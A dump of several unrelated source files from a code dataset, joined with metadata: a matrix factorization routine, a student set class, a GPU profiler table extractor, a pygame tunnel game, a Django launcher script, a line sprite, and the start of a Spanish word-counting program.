while iter_ <= max_iter:\n norm = self.f(A, S)\n self.norms.append(norm)\n if verbose and not iter_ % verbose:\n print(\"LSPG Iter: \", iter_, \"Norm: \", self.norms[-1])\n\n A_tent = positive_projection(A - alpha * self.f_A(A, S))\n while self.f(A_tent, S) - self.f(A, S) > sigma * fip(self.f_A(A, S), A_tent-A):\n alpha *= beta\n print(\"ALPHA: \", alpha)\n A_tent = positive_projection(A - alpha * self.f_A(A, S))\n\n A = A_tent\n\n S_tent = positive_projection(S - alpha * self.f_S(A, S))\n while self.f(A, S_tent) - self.f(A, S) > sigma * fip(self.f_S(A, S), S_tent-S):\n alpha *= beta # make alpha2 smaller\n S_tent = positive_projection(S - alpha * self.f_S(A, S))\n\n S = S_tent\n\n\n\n # other 
stopping condition\n if iter_ >= 2 and abs(self.norms[-1] - self.norms[-2]) <= tol:\n break\n\n iter_ += 1\n\n self.A = A\n self.S = S\n\n def sgd(self, alpha=.001, max_iter=1000, verbose=10, tol=10e-6, A_start=None, S_start=None):\n # THIS CODE IS INSPIRED BY, BUT NOT COPIED FROM, http://www.albertauyeung.com/post/python-matrix-factorization/\n \"\"\"\n Implements a stochastic gradient descent training method\n :param alpha:\n :param max_iter:\n :param verbose:\n :param A_start:\n :param S_start:\n :return:\n \"\"\"\n\n self.norms = []\n\n if A_start is not None:\n A = A_start\n else:\n A = np.random.uniform(self.epsilon, self.scale, size=(self.m, self.k))\n\n if S_start is not None:\n S = S_start\n else:\n S = np.random.uniform(self.epsilon, self.scale, size=(self.k, self.n))\n\n samples = [\n (i, j, self.X[i, j])\n for i in range(self.m)\n for j in range(self.n)\n if self.X[i, j] > 0\n ]\n\n iter_ = 0\n while iter_ <= max_iter:\n norm = self.f(A, S)\n self.norms.append(norm)\n if verbose and not iter_ % verbose:\n print(\"SGD Iter: \", iter_, \"Norm: \", self.norms[-1])\n\n np.random.shuffle(samples)\n for i, j, r in samples:\n prediction = A[i, :].dot(S[:, j])\n e = (r - prediction)\n A[i, :] += alpha * (e * S[:, j])\n S[:, j] += alpha * (e * A[i, :])\n\n\n\n\n # other stopping condition\n if iter_ >= 2 and abs(self.norms[-1] - self.norms[-2]) <= tol:\n break\n\n iter_ += 1\n\n","sub_path":"nonnegative_matrix_factorization.py","file_name":"nonnegative_matrix_factorization.py","file_ext":"py","file_size_in_byte":10841,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"221307932","text":"\"\"\"Description: This program is a custom set of methods for the set class, and includes a lot of overrides.\n\n\n_author_ = 'Dakota Parks', 'Ian Cross', 'Suman Koirala'\n_date_ = '4/22/2015'\n\n\"\"\"\n\nclass CustomSet:\n def __init__(self, listOfNums):\n \"\"\"Preconditions: Accepts list of nums, expected to be a list of ints.\n Description: This is a constructor that takes a list of numbers and then builds a list without any duplicates\n Postconditions: An object of type CustomSet is created, which is a list\"\"\"\n self._newList=[]\n self._listOfNums=listOfNums\n for el in self._listOfNums:\n if el not in self._newList:\n self._newList.append(el)\n self._listOfNums = sorted(self._newList)\n\n def getList(self):\n return self._listOfNums\n \n def __contains__(self, member):\n \"\"\"Preconditions: Accepts self and member, expected to be an int or string.\n Description: This method overrides \"in\" and looks for the specific member in the set.\n Postconditions: Prints either \"Yes\" or \"Not there\".\"\"\"\n if member in self._listOfNums:\n print(\"Yes\")\n if member not in self._listOfNums:\n print(\"Not there\")\n\n def __str__(self):\n \"\"\"Preconditions: Only receives self.\n Description: Returns a string of the CustomSet object.\n Postconditions: Nothing, only returns a string.\"\"\"\n return(str(self._listOfNums))\n \n def __add__(self, other):\n \"\"\"Pre-conditions: This program assumes that both variables are\n of the type CustomSet. \n Description: This method overloads the \"+\" on two CustomSet. It\n returns a new CustomSet that is the union of the two sets.\n Post-conditions: Makes a new CustomSet Object with the results of\n this operation. \"\"\"\n \n firstlist = self.getList()\n secondlist = other.getList()\n newlist = []\n for i in secondlist:\n if i not in firstlist:\n newlist.append(i)\n for i in firstlist:\n if i not in newlist:\n newlist.append(i)\n newSet = CustomSet(newlist)\n return newSet\n\n def __and__(self, other):\n \"\"\"Pre-conditions: This program assumes that both variables are\n of the type CustomSet. \n Description: This method allows the intersection of two sets by\n using the \"&\" between two CustomSet objects. It returns a new\n set object with the common elements between both sets.\n Post-conditions: Makes a new CustomSet Object with the results of\n this operation. \"\"\"\n newlist = []\n firstlist = self.getList()\n secondlist = other.getList()\n for i in firstlist:\n for x in secondlist:\n if i == x:\n newlist.append(i)\n newSet = CustomSet(newlist)\n return newSet\n \n def __sub__(self, other):\n \"\"\"Pre-Conditions: This program assumes that both variables are\n of the type CustomSet.\n Description: This method lets the \"-\" work with custom sets. It\n returns a new set with the elements exclusive to the first set.\n Post-Conditions: Makes a new CustomSet Object with the results of\n this operation.\"\"\"\n newlist = []\n firstlist = self.getList()\n secondlist = other.getList()\n for i in firstlist:\n if i not in secondlist:\n newlist.append(i)\n newSet = CustomSet(newlist)\n return newSet\n \n def brackets(self):\n \"\"\"Preconditions: Only receives self.\n Description: Returns a string of the CustomSet object surrounded by brackets.\n Postconditions: Nothing, returns a string.\"\"\"\n return(\"{ \"+str(self)+\" }\")\n \n def __ge__(self,other):\n \"\"\"\n Description: Whether this set's sorted list compares greater than or equal to the other's.\n Preconditions: Two values of datatype CustomSet.\n Postcondition:None\n \"\"\" \n if self._newList >= other._newList:\n return \"Yes\"\n else:\n return \"No Subset\"\n \n def __le__(self,other):\n \"\"\"\n Description: Whether this set's sorted list compares less than or equal to the other's.\n Precondition: Two values of datatype CustomSet.\n PostCondition:None\n \"\"\" \n if self._newList <= other._newList: \n return \"Yes\"\n else:\n return \"No Subset\"\n def __len__(self):\n \"\"\"\n Description: Find the length of the given list.\n Precondition:none\n postcondition:none\n \"\"\"\n return len(self._newList)\n\n\n\n","sub_path":"modCustomSet.py","file_name":"modCustomSet.py","file_ext":"py","file_size_in_byte":5223,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"424336768","text":"#!/usr/bin/python\n\n################################################################################\n# Copyright (c) 2018 Advanced Micro Devices, Inc. All rights reserved.\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n################################################################################\n\nimport os, sys, re\n\n# Parsing results in the format:\n#dispatch[0], queue_index(0), kernel_name(\"SimpleConvolution\"), time(1048928000311041,1048928006154674,1048928006168274,1048928006170503):\n# GRBM_GUI_ACTIVE (74332)\n# SQ_WAVES (4096)\n# SQ_INSTS_VMEM_RD (36864)\n\n# global vars\nvar_list = ['Index', 'KernelName', 'DispatchNs', 'BeginNs', 'EndNs', 'CompleteNs']\nvar_table = {}\n#############################################################\n\ndef fatal(msg):\n sys.stderr.write(sys.argv[0] + \": \" + msg + \"\\n\");\n sys.exit(1)\n#############################################################\n\n# parse results method\ndef parse_res(infile):\n if not os.path.isfile(infile): fatal(\"Error: input file '\" + infile + \"' not found\")\n inp = open(infile, 'r')\n\n beg_pattern = re.compile(\"^dispatch\\[(\\d*)\\], queue_index\\(\\d*\\), kernel_name\\(\\\"([^\\\"]*)\\\"\\)\")\n ts_pattern = re.compile(\", time\\((\\d*),(\\d*),(\\d*),(\\d*)\\)\")\n var_pattern = re.compile(\"^\\s*([^\\s]*)\\s+\\((\\d*)\\)\")\n\n dispatch_number = 0\n for line in inp.readlines():\n record = line[:-1]\n\n m = var_pattern.match(record)\n if m:\n if not dispatch_number in var_table: fatal(\"Error: dispatch number not unique '\" + str(dispatch_number) + \"'\")\n var = m.group(1)\n val = m.group(2)\n var_table[dispatch_number][m.group(1)] = m.group(2)\n if not var in var_list: var_list.append(var)\n\n m = beg_pattern.match(record)\n if m:\n dispatch_number = m.group(1)\n if not dispatch_number in var_table:\n var_table[dispatch_number] = {\n 'Index': dispatch_number,\n 'KernelName': \"\\\"\" + m.group(2) + \"\\\"\"\n }\n m = ts_pattern.search(record)\n if m:\n var_table[dispatch_number]['DispatchNs'] = m.group(1)\n var_table[dispatch_number]['BeginNs'] = m.group(2)\n var_table[dispatch_number]['EndNs'] = m.group(3)\n var_table[dispatch_number]['CompleteNs'] = m.group(4)\n\n inp.close()\n#############################################################\n\n# print results table method\ndef print_tbl(outfile):\n global var_list\n if len(var_table) == 0: return 1\n\n out = open(outfile, 'w')\n\n keys = var_table.keys()\n keys.sort(key=int)\n\n entry = var_table[keys[0]]\n list1 = []\n for var in var_list:\n if var in entry:\n list1.append(var)\n var_list = list1\n\n for var in var_list: out.write(var + ',')\n out.write(\"\\n\")\n\n for ind in keys:\n entry = var_table[ind]\n dispatch_number = entry['Index']\n if ind != dispatch_number: fatal(\"Dispatch #\" + ind + \" index mismatch (\" + dispatch_number + \")\\n\")\n for var in var_list: out.write(entry[var] + ',')\n out.write(\"\\n\")\n\n out.close()\n return 0\n#############################################################\n\n# main\nif (len(sys.argv) < 3): fatal(\"Usage: \" + sys.argv[0] + \" \")\n\noutfile = sys.argv[1]\ninfiles = sys.argv[2:]\nfor f in infiles:\n parse_res(f)\nret = print_tbl(outfile)\nsys.exit(ret)\n#############################################################\n","sub_path":"bin/tblextr.py","file_name":"tblextr.py","file_ext":"py","file_size_in_byte":4321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"553440641","text":"import pygame\nimport 
random\nfrom os import path\n\nimg_dir = path.join(path.dirname(__file__), 'img')\nsnd_dir = path.join(path.dirname(__file__), 'snd')\n\nPOWERUP_TIME = 5000 # 5 seconds of power-up time\n\nWIDTH = 1280 # screen width\nHEIGHT = 720 # screen height\nFPS = 60 # frames per second = 60\n\n# Colour definitions\nWHITE = (255, 255, 255)\nBLACK = (0, 0, 0)\nRED = (255, 0, 0)\nGREEN = (0, 255, 0)\nBLUE = (0, 0, 255)\nBROWN = (101, 67, 33)\nGREY = (20, 20, 20)\n\npygame.init()\npygame.mixer.init() # initialise the pygame mixer so that sound works\n\ndef draw_text(surf, text, size, x, y):\n font_name = pygame.font.Font(\"Blitz/8.TTF\", size)\n text_surface = font_name.render(text, True, WHITE)\n text_rect = text_surface.get_rect()\n text_rect.midtop = (x, y)\n surf.blit(text_surface, text_rect)\n\ndef newpowerup():\n pow = Pow()\n all_sprites.add(pow)\n powerups.add(pow)\n\ndef newmob():\n m = Mob()\n all_sprites.add(m)\n mobs.add(m)\n\ndef draw_shield_bar(surf, x, y, pct):\n if pct < 0:\n pct = 0\n BAR_LENGTH = 100\n BAR_HEIGHT = 20\n fill = (pct / 100) * BAR_LENGTH\n outline_rect = pygame.Rect(x, y, BAR_LENGTH, BAR_HEIGHT)\n fill_rect = pygame.Rect(x, y, fill, BAR_HEIGHT)\n pygame.draw.rect(surf, GREEN, fill_rect)\n pygame.draw.rect(surf, WHITE, outline_rect, 2)\n\ndef draw_lives(surf, x, y, lives, img):\n for i in range(lives):\n img_rect = img.get_rect()\n img_rect.x = x + 30 * i\n img_rect.y = y\n surf.blit(img, img_rect)\n\ndef show_go_screen():\n global tunnels, all_sprites, tunnel_hoogte, tunnel_gat, diff_1, diff_2, diff_3\n screen.blit(background, (0,0))\n draw_text(screen, \"Space Escape\", 70, WIDTH / 2, HEIGHT / 4)\n\n draw_text(screen, \"PowerUps\", 30, WIDTH / 2, HEIGHT / 2)\n draw_text(screen, \"Pill gives Shield Restore and Bullets\", 20, WIDTH / 2, HEIGHT / 1.8)\n draw_text(screen, \"Shield gives Shield Restore\", 20, WIDTH / 2, HEIGHT / 1.7)\n draw_text(screen, \"Bolt gives Bullets\", 20, WIDTH / 2, HEIGHT / 1.6)\n\n draw_text(screen, \"Keys\", 30, WIDTH / 2, HEIGHT / 1.4)\n draw_text(screen, \"Use the arrow keys to move around\", 20, WIDTH / 2, HEIGHT / 1.3)\n draw_text(screen, \"Use space to shoot\", 20, WIDTH / 2, HEIGHT / 1.25)\n draw_text(screen, \"Press R to begin\", 20, WIDTH / 2, HEIGHT / 1.15)\n draw_text(screen, \"Press esc or q key to Exit at any time\", 20, WIDTH / 2, HEIGHT / 1.1)\n #draw_text(screen, \"Highscore: \" + str(highscore), 20, WIDTH / 2, HEIGHT / 3)\n pygame.display.flip()\n waiting = True\n while waiting:\n clock.tick(FPS)\n for event in pygame.event.get():\n if event.type == pygame.QUIT: # clicking the red cross closes the game\n pygame.quit()\n if pygame.key.get_pressed()[pygame.K_r]: # pressing R starts the game\n waiting = False\n\n tunnel_gat = 400\n tunnel_half = (HEIGHT / 2) - (tunnel_gat / 2)\n tunnel_i = 0\n tunnel_hoogte = 200\n\n diff_1 = False\n diff_2 = False\n diff_3 = False\n\n while len(tunnels) < 128 * 2 + 10:\n while tunnel_hoogte > tunnel_half:\n tunnel_hoogte += -5\n while tunnel_hoogte <= 0:\n tunnel_hoogte += 5\n\n tunnel_hoogte += random.randrange(-5, 6)\n\n # Top half of the tunnel\n t = Tunnel(tunnel_i, 0, tunnel_hoogte)\n tunnels.add(t)\n # Bottom half of the tunnel\n t = Tunnel(tunnel_i, HEIGHT - tunnel_hoogte, tunnel_hoogte)\n tunnels.add(t)\n tunnel_i += 10\n\nclass Tunnel(pygame.sprite.Sprite):\n def __init__(self, x, y, h):\n pygame.sprite.Sprite.__init__(self)\n self.image = pygame.Surface((10,h))\n self.image.fill(GREY)\n self.rect = self.image.get_rect()\n self.rect.topleft = (x, y)\n\n def update(self):\n\n self.rect.x += -5\n\nclass 
Player(pygame.sprite.Sprite):\n # Sprite for the Player\n def __init__(self):\n pygame.sprite.Sprite.__init__(self)\n self.image = pygame.image.load(\"SE/spaceship.png\").convert_alpha()\n self.image = pygame.transform.rotate(self.image, 270)\n self.image = pygame.transform.scale(self.image, (60, 60))\n self.rect = self.image.get_rect()\n self.radius = 20\n #pygame.draw.circle(self.image, RED, self.rect.center, self.radius)\n self.rect.center = (WIDTH / 4, HEIGHT / 2)\n self.speedx = 0\n self.speedy = 0\n self.shield = 100\n self.shoot_delay = 250\n self.last_shot = pygame.time.get_ticks()\n self.lives = 3\n self.hidden = False\n self.hide_timer = pygame.time.get_ticks()\n self.power = 0\n self.power_time = pygame.time.get_ticks()\n\n def powerup(self):\n self.power += 1\n self.power_time = pygame.time.get_ticks()\n\n def update(self):\n # Time out for powerups\n if self.power >= 1 and pygame.time.get_ticks() - self.power_time > POWERUP_TIME:\n self.power -= 1\n self.power_time = pygame.time.get_ticks()\n\n # Unhide if hidden\n if self.hidden and pygame.time.get_ticks() - self.hide_timer > 1000:\n self.hidden = False\n self.rect.center = (WIDTH / 4, HEIGHT / 2)\n self.speedx = 0\n self.speedy = 0\n keystate = pygame.key.get_pressed()\n if keystate[pygame.K_DOWN] or keystate[pygame.K_s]:\n self.speedy += 5\n if keystate[pygame.K_UP] or keystate[pygame.K_w]:\n self.speedy -= 5\n if keystate[pygame.K_RIGHT] or keystate[pygame.K_d]:\n self.speedx += 5\n if keystate[pygame.K_LEFT] or keystate[pygame.K_a]:\n self.speedx -= 5\n if keystate[pygame.K_SPACE]:\n self.shoot()\n\n self.rect.x += self.speedx\n self.rect.y += self.speedy\n\n if self.rect.right > WIDTH:\n self.rect.right = WIDTH\n if self.rect.left < 0:\n self.rect.left = 0\n\n def shoot(self):\n now = pygame.time.get_ticks()\n if now - self.last_shot > self.shoot_delay:\n self.last_shot = now\n if self.power >= 1:\n bullet = Bullet(self.rect.right, self.rect.centery)\n all_sprites.add(bullet)\n bullets.add(bullet)\n shoot_sound.play()\n keystate = pygame.key.get_pressed()\n if keystate[pygame.K_SPACE]:\n self.shoot()\n\n def hide(self):\n # hide the player temporarily\n self.hidden = True\n self.hide_timer = pygame.time.get_ticks()\n self.rect.center = (WIDTH / 2, HEIGHT + 200)\n\nclass Mob(pygame.sprite.Sprite):\n def __init__(self):\n pygame.sprite.Sprite.__init__(self)\n self.image_orig = random.choice(meteor_images)\n self.image = self.image_orig.copy()\n self.rect = self.image.get_rect()\n self.radius = int(self.rect.width * 0.45 / 2)\n pygame.draw.circle(self.image, RED, self.rect.center, self.radius)\n self.rect.x = 1300\n self.rect.y = random.randrange(60, 640)\n self.speedx = random.randrange(6, 10)\n self.rot = 0\n self.rot_speed = random.randrange(-8, 8)\n self.last_update = pygame.time.get_ticks()\n\n def rotate(self):\n now = pygame.time.get_ticks()\n if now - self.last_update > 50:\n self.last_update = now\n self.rot = (self.rot + self.rot_speed) % 360\n new_image = pygame.transform.rotate(self.image_orig, self.rot)\n old_center = self.rect.center\n self.image = new_image\n self.rect = self.image.get_rect()\n self.rect.center = old_center\n\n def update(self):\n self.rotate()\n self.rect.x -= self.speedx\n if self.rect.right < 0:\n self.rect.x = 1300\n self.rect.y = random.randrange(60, 640)\n self.speedx = random.randrange(6, 10)\n\nclass Bullet(pygame.sprite.Sprite):\n def __init__(self, x, y):\n pygame.sprite.Sprite.__init__(self)\n self.image = pygame.Surface((10, 5))\n self.image.fill(RED)\n self.rect = 
self.image.get_rect()\n self.rect.bottom = y\n self.rect.centerx = x\n self.speedx = -4\n\n def update(self):\n self.rect.x -= self.speedx\n # Kill the bullet when off the screen\n if self.rect.centerx < -10:\n self.kill()\n #if self.rect.centerx > 500:\n # self.kill()\n\nclass Pow(pygame.sprite.Sprite):\n def __init__(self):\n pygame.sprite.Sprite.__init__(self)\n self.type = random.choice(['shield', 'gun', 'pill'])\n self.image = powerup_images[self.type]\n self.rect = self.image.get_rect()\n self.rect.x = random.randrange(1300, 1800)\n self.rect.y = HEIGHT / 2\n self.speedx = random.randrange(6, 10)\n\n def update(self):\n self.rect.x -= self.speedx\n if self.rect.right < 0:\n self.rect.x = 1300\n self.rect.y = HEIGHT / 2\n self.speedx = random.randrange(6, 10)\n\nclass Explosion(pygame.sprite.Sprite):\n def __init__(self, center, size):\n pygame.sprite.Sprite.__init__(self)\n self.size = size\n self.image = explosion_anim[self.size][0]\n self.rect = self.image.get_rect()\n self.rect.center = center\n self.frame = 0\n self.last_update = pygame.time.get_ticks()\n self.frame_rate = 75\n\n def update(self):\n now = pygame.time.get_ticks()\n if now - self.last_update > self.frame_rate:\n self.last_update = now\n self.frame += 1\n if self.frame == len(explosion_anim[self.size]):\n self.kill()\n else:\n center = self.rect.center\n self.image = explosion_anim[self.size][self.frame]\n self.rect = self.image.get_rect()\n self.rect.center = center\n\n# Load all game graphics\nscreen = pygame.display.set_mode((WIDTH, HEIGHT), pygame.FULLSCREEN)\nheart = pygame.image.load(path.join(img_dir, \"heart_2.gif\")).convert()\nlive = pygame.transform.scale(heart, (30, 30))\nmeteor_images = []\nmeteor_list = ['small1.png', 'small2.png', 'small3.png', 'small4.png', 'small5.png', 'small6.png',\n 'medium1.png', 'medium2.png', 'medium3.png', 'medium4.png', 'medium5.png', 'medium5.png']\nfor img in meteor_list:\n meteor_images.append(pygame.image.load(path.join(img_dir, img)).convert_alpha())\n\n# Directory explosion images\nexplosion_anim = {}\nexplosion_anim['lg'] = []\nexplosion_anim['sm'] = []\nexplosion_anim['player'] = []\nfor i in range (9):\n filename = 'regularExplosion0{}.png'.format(i)\n img = pygame.image.load(path.join(img_dir, filename)).convert_alpha()\n img_lg = pygame.transform.scale(img, (75, 75))\n explosion_anim['lg'].append(img_lg)\n img_sm = pygame.transform.scale(img, (32, 32))\n explosion_anim['sm'].append(img_sm)\n filename = 'sonicExplosion0{}.png'.format(i)\n img = pygame.image.load(path.join(img_dir, filename)).convert_alpha()\n explosion_anim['player'].append(img)\n\n# Directory power up images\npowerup_images = {}\npowerup_images['shield'] = pygame.image.load(path.join(img_dir, 'shield_silver.png')).convert_alpha()\npowerup_images['gun'] = pygame.image.load(path.join(img_dir, 'bold_silver.png')).convert_alpha()\npowerup_images['pill'] = pygame.image.load(path.join(img_dir, 'pill_yellow.png')).convert_alpha()\n\n# Load all game sounds\nshoot_sound = pygame.mixer.Sound(path.join(snd_dir, 'laser1.wav'))\nshoot_sound.set_volume(0.2)\nexpl_sound = pygame.mixer.Sound(path.join(snd_dir, 'explosion.wav'))\nexpl_sound.set_volume(0.2)\nplayer_die_sound = pygame.mixer.Sound(path.join(snd_dir, 'rumble1.ogg'))\nplayer_die_sound.set_volume(0.2)\npygame.mixer.music.load(path.join(snd_dir, 'space.ogg'))\npygame.mixer.music.set_volume(0.35)\n\npygame.display.set_caption(\"Space Escape\")\nclock = pygame.time.Clock()\n\nbackground = pygame.image.load(\"SE/starfield.jpg\").convert()\n\ntunnels = 
pygame.sprite.Group()\nall_sprites = pygame.sprite.Group()\n\n# Game loop\n\ndef Escape_Game(ext_screen, story):\n print(story)\n global all_sprites, mobs, bullets, tunnel_gat, screen, powerups\n\n screen = ext_screen\n newscore = 0\n running = True\n game_over = True\n pygame.mixer.music.play(loops=-1)\n\n x = 0\n tunnel_gat = 400\n tunnel_half = (HEIGHT / 2) - (tunnel_gat / 2)\n tunnel_i = 0\n tunnel_hoogte = 200\n\n diff_1 = False\n diff_2 = False\n diff_3 = False\n\n while running:\n if game_over:\n show_go_screen()\n mobs = pygame.sprite.Group()\n bullets = pygame.sprite.Group()\n powerups = pygame.sprite.Group()\n player = Player()\n all_sprites.add(player)\n game_over = False\n\n score = 0\n for i in range(10):\n newmob()\n\n # Keep loop running at the right speed\n clock.tick(FPS)\n # Process input (events)\n for event in pygame.event.get():\n # Check for closing window\n if pygame.key.get_pressed()[pygame.K_ESCAPE] or pygame.key.get_pressed()[pygame.K_q]:\n all_sprites.empty()\n mobs.empty()\n bullets.empty()\n powerups.empty()\n running = False\n tunnel_gat = 400\n tunnel_half = (HEIGHT / 2) - (tunnel_gat / 2)\n if running == False:\n pygame.mixer.music.fadeout(1000)\n\n # Keep Creating Tunnels\n for tunnel in tunnels: # remove tunnels once they have left the screen\n if tunnel.rect.x <= -10:\n tunnel.kill()\n\n while len(tunnels) < (128 * 2) + 25:\n print(tunnel_half)\n while tunnel_hoogte > tunnel_half:\n tunnel_hoogte += -10\n print('1')\n while tunnel_hoogte <= 0:\n tunnel_hoogte += 10\n print('2')\n\n tunnel_hoogte += random.randrange(-5, 8)\n\n # Top half of the tunnel\n t = Tunnel(WIDTH + 10, 0, tunnel_hoogte)\n tunnels.add(t)\n # Bottom half of the tunnel\n t = Tunnel(WIDTH + 10, HEIGHT - tunnel_hoogte, tunnel_hoogte)\n tunnels.add(t)\n\n if x < 100:\n score += 0.25\n\n if score > newscore + 400:\n newpowerup()\n newscore = score\n\n if score > 1000 and not diff_1:\n print(\"Updated\")\n tunnel_gat = 300\n tunnel_half = (HEIGHT / 2) - (tunnel_gat / 2)\n diff_1 = True\n\n if score > 2000 and not diff_2:\n print(\"Updated\")\n tunnel_gat = 200\n tunnel_half = (HEIGHT / 2) - (tunnel_gat / 2)\n diff_2 = True\n\n if score > 3000 and not diff_3:\n print(\"Updated\")\n tunnel_gat = 150\n tunnel_half = (HEIGHT / 2) - (tunnel_gat / 2)\n diff_3 = True\n\n if score > 3000 and story == True:\n running = False\n\n #if score > 4000 and not diff_2:\n # print(\"Updated\")\n # tunnel_gat = 200\n # tunnel_half = (HEIGHT / 2) - (tunnel_gat / 2)\n # diff_2 = True\n\n # Update\n all_sprites.update()\n tunnels.update()\n\n # Check to see if a bullet hit mob\n hits = pygame.sprite.groupcollide(mobs, bullets, True, True)\n for hit in hits:\n score += 50 - hit.radius\n expl_sound.play()\n expl = Explosion(hit.rect.center, 'lg')\n all_sprites.add(expl)\n newmob()\n\n # Check to see if the player hits the wall\n hits = pygame.sprite.spritecollide(player, tunnels, False, pygame.sprite.collide_circle)\n for hit in hits:\n player.shield -= 10\n expl = Explosion(hit.rect.center, 'sm')\n all_sprites.add(expl)\n if player.shield <= 0:\n player_die_sound.play()\n death_explosion = Explosion(player.rect.center, 'player')\n all_sprites.add(death_explosion)\n player.hide()\n player.lives -= 1\n player.shield = 100\n\n # Check to see if a mob hits the wall\n hits = pygame.sprite.groupcollide(mobs, tunnels, True, False)\n for hit in hits:\n newmob()\n\n # Check to see if a power up hits the wall\n hits = pygame.sprite.groupcollide(powerups, tunnels, True, False)\n for hit in hits:\n newpowerup()\n\n # Check to see if the 
player hit a powerup\n hits = pygame.sprite.spritecollide(player, powerups, True, pygame.sprite.collide_mask)\n for hit in hits:\n if hit.type == 'shield':\n player.shield += random.randrange(10, 50)\n if player.shield >= 100:\n player.shield = 100\n if hit.type == 'gun':\n player.powerup()\n if hit.type == 'pill':\n player.shield += random.randrange(10, 50)\n if player.shield >= 100:\n player.shield = 100\n player.powerup()\n\n # Check to see if a mob hit the player\n hits = pygame.sprite.spritecollide(player, mobs, True, pygame.sprite.collide_circle)\n for hit in hits:\n player.shield -= hit.radius * 0.5\n expl = Explosion(hit.rect.center, 'sm')\n all_sprites.add(expl)\n newmob()\n if player.shield <= 0:\n player_die_sound.play()\n death_explosion = Explosion(player.rect.center, 'player')\n all_sprites.add(death_explosion)\n player.hide()\n player.lives -= 1\n player.shield = 100\n\n # If the player died and the explosion has finished playing\n if player.lives <= 0 and not death_explosion.alive():\n game_over = True\n tunnels.empty()\n all_sprites.empty()\n diff_1 = False\n diff_2 = False\n diff_3 = False\n tunnel_gat = 400\n tunnel_half = (HEIGHT / 2) - (tunnel_gat / 2)\n\n # Draw / Render\n rel_x = x % background.get_rect().width\n\n screen.blit(background, (rel_x - background.get_rect().width, 0))\n if rel_x < WIDTH:\n screen.blit(background, (rel_x, 0))\n x -= 2\n\n all_sprites.draw(screen)\n tunnels.draw(screen)\n\n draw_text(screen, str(int(score)), 30, WIDTH / 2, 10)\n draw_shield_bar(screen, 5, 5, player.shield)\n draw_lives(screen, WIDTH - 100, 5, player.lives, live)\n # After drawing everything, flip the display\n pygame.display.flip()","sub_path":"SE/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":18639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"228934404","text":"import sys\nimport os.path\n\ndjango_starter = 'python manage.py '\n\ndef install_django_2():\n answer = input(\"Do you want to install Django 2 to run this code [n/y]? \")\n if(answer.lower() == 'y'):\n print('Installing Django 2.')\n import pip\n pip.main(['install', 'django==2.0'])\n\ndef first_call():\n return not os.path.isfile('no_migration')\n\ndef generate_migrations():\n os.system(django_starter + \"makemigrations\")\n os.system(django_starter + \"migrate\")\n\n file = open('no_migration', 'w')\n file.close()\n\nif __name__ == \"__main__\":\n\n if(sys.version_info[0] < 3):\n print(\"Sorry! 
This project requires at least Python 3.\")\n else:\n try:\n import django\n if django.VERSION[0] > 2:\n install_django_2()\n except ImportError:\n install_django_2()\n\n print(\"Initializing Django:\")\n\n if first_call():\n generate_migrations()\n\n if len(sys.argv) > 1 and sys.argv[1] == 'test':\n os.system(django_starter + \"test\")\n else:\n os.system(django_starter + \"runserver --noreload\")","sub_path":"paranuaraChallenge/start.py","file_name":"start.py","file_ext":"py","file_size_in_byte":1127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"626980483","text":"import pygame\n\nclass Line(pygame.sprite.Sprite):\n '''Class for a line.\n Inherits from a sprite so it can be easily added to sprite groups.'''\n def __init__(self, surface=None, color=(255,255,255), posOne=(0,0), posTwo=(0,0), width=1, transparent=True, *groups):\n super().__init__(groups)\n self.color = color\n self.posOne = posOne\n self.posTwo = posTwo\n self.width = width\n self.rect= None\n self.image = None\n self.surface = surface\n self.transparent = transparent\n\n self.update()\n\n def draw(self, surface):\n self.rect = pygame.draw.line(self.surface, self.color, self.posOne, self.posTwo, self.width)\n self.image = pygame.Surface((self.rect.w, self.rect.h))\n if self.transparent:\n self.image.set_colorkey((0,0,0))\n self.surface.blit(self.image, self.rect)\n\n def update(self):\n self.rect = pygame.draw.line(self.surface, self.color, self.posOne, self.posTwo, self.width)\n self.image = pygame.Surface((self.rect.w, self.rect.h))\n if self.transparent:\n self.image.set_colorkey((0,0,0))\n","sub_path":"lightning/line.py","file_name":"line.py","file_ext":"py","file_size_in_byte":1142,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"358082622","text":"# Program information\n# Program name: Descubre tu palabra\n# Author: Hernán Araya\n# Description: The program shows information about the entered word, such as\n# the number of letters, the number of consonants and vowels, and the repeated letters with their counts\n\n# Declaration of the alphabet dictionary\ndict_alfabeto = {'a': 1, 'b': 1, 'c': 1, 'd': 1, 'e': 1, 'f': 1, 'g': 1, 'h': 1, 'i': 1, 'j': 1,\n 'k': 1, 'l': 1, 'm': 1, 'ñ': 1, 'n': 1, 'o': 1, 'p': 1, 'q': 1, 'r': 1, 's': 1,\n 't': 1, 'u': 1, 'v': 1, 'w': 1, 'x': 1, 'y': 1, 'z': 1}\n\n# Declaration of the variables used to process the data\nvocales = 0\nconsonantes = 0\nletras_repetidas = 0\ndict_letras_repetidas = {}\nlista_palabras_ingresadas = []\nletra_encontrada = 0\n\n# 